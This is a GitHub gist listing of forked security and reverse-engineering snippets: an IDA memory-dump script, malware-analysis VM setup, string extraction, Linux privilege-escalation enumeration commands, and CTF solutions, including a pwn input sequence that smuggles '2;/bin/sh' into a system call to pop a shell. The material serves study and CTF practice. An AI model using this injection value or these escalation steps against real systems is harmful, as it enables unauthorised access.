naveenselvan
/ ida_memdump.py
Created
November 22, 2019 14:15
— forked from herrcore/ida_memdump.py
Dump a blob of memory into a file - IDA Pro script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import idautils | |
| import idaapi | |
| def memdump(ea, size, file): | |
| data = idc.GetManyBytes(ea, size) | |
| with open(file, "wb") as fp: | |
| fp.write(data) | |
| print "Memdump Success!" |
naveenselvan
/ oalabs_x86vm.ps1
Created
May 14, 2019 06:41
— forked from OALabs/oalabs_x86vm.ps1
Boxstarter package for OALABS x86 Malware Analysis VM
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Write-Host -NoNewline " " | |
| Write-Host -NoNewline " _______ _______ ___ _______ _______ _______ " | |
| Write-Host -NoNewline " | || _ || | | _ || _ || | " | |
| Write-Host -NoNewline " | _ || |_| || | | |_| || |_| || _____| " | |
| Write-Host -NoNewline " | | | || || | | || || |_____ " | |
| Write-Host -NoNewline " | |_| || || |___ | || _ | |_____ | " | |
| Write-Host -NoNewline " | || _ || || _ || |_| | _____| | " | |
| Write-Host -NoNewline " |_______||__| |__||_______||__| |__||_______||_______| " | |
| Write-Host -NoNewline " " | |
| Write-Host -NoNewline " " |
naveenselvan
/ strings.py
Created
May 14, 2019 06:29
— forked from williballenthin/strings.py
Extract ASCII and Unicode strings using Python.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| from collections import namedtuple | |
| ASCII_BYTE = " !\"#\$%&\'\(\)\*\+,-\./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\]\^_`abcdefghijklmnopqrstuvwxyz\{\|\}\\\~\t" | |
| String = namedtuple("String", ["s", "offset"]) | |
naveenselvan
/ SandBoxTest.cpp
Created
May 13, 2019 16:43
— forked from herrcore/SandBoxTest.cpp
Test code for the Open Analysis Live! sandbox tutorial.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SandBoxTest.cpp : Defines the entry point for the console application. | |
| // | |
| #include "stdafx.h" | |
| #include <windows.h> | |
| #include <tchar.h> | |
| #include <stdio.h> | |
| #include <strsafe.h> | |
| #include <string> | |
| using namespace std; |
naveenselvan
/ linux_privesc
Created
February 24, 2019 14:01
— forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Determine linux distribution and version | |
| cat /etc/issue | |
| cat /etc/*-release | |
| cat /etc/lsb-release | |
| cat /etc/redhat-release | |
| // Determine kernel version - 32 or 64-bit? | |
| cat /proc/version | |
| uname -a | |
| uname -mrs |
naveenselvan
/ share_plz_solve.py
Created
February 4, 2019 10:52
— forked from evanpjensen/share_plz_solve.py
Solution to share plz from bitsctf
naveenselvan
/ calender
Created
December 7, 2018 13:51
— forked from iamalsaher/calender
Pwn challenge inctf solutions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 2 #set the month | |
| 12 #set month as december | |
| 1 #set year | |
| 2 #set year as 2, allocate a chunk | |
| 5 #free the chunk, this will free the year chunk to be used anywhere | |
| 4 #set an admin, this will allocate the year chunk for itself, and we can put arbitrary data for year chunk | |
| 2;/bin/sh #set this as an admin, this will get stored in the original year chunk, effectively being reused after being called | |
| 3 #show calender and exec system (cal 12 2;/bin/sh) effectively popping shell |
naveenselvan
/ rpn.php
Last active
October 11, 2018 06:14
— forked from TheRealJAG/rpn.php
'Reverse Polish Notation' calculator in PHP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Getting User Input & Script will give the result instead of HardCoding The I/p | |
| #Note:Only User Input is modified & rest of the code is same #Beginner Friendly Tweaked Script By Beginner in PHP | |
| <form action="" method="get"> | |
| Enter Number: | |
| <input type="text" name="val1" id="val1"></input> | |
| <?php echo ""; ?> | |
| <br></br> | |
naveenselvan
/ time.py
Last active
October 11, 2018 05:57
— forked from berdoezt/time.py
first solver
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| a = [0x6E, 0x69, 0x64, 0x73, 0x61, 0x7C, 0x53, 0x6F, 0x36,0x74, 0x58, 0x26, 0x74, 0x58, 0x6D, 0x52, 0x74, 0x73, 0x58, 0x73, 0x6F, 0x34, 0x58, 0x45, 0x34, 0x60, 0x6E,0x69, 0x49, 0x6E, 0x69, 0x60, 0x7A] | |
| print("".join(chr(i ^ 7) for i in a)) |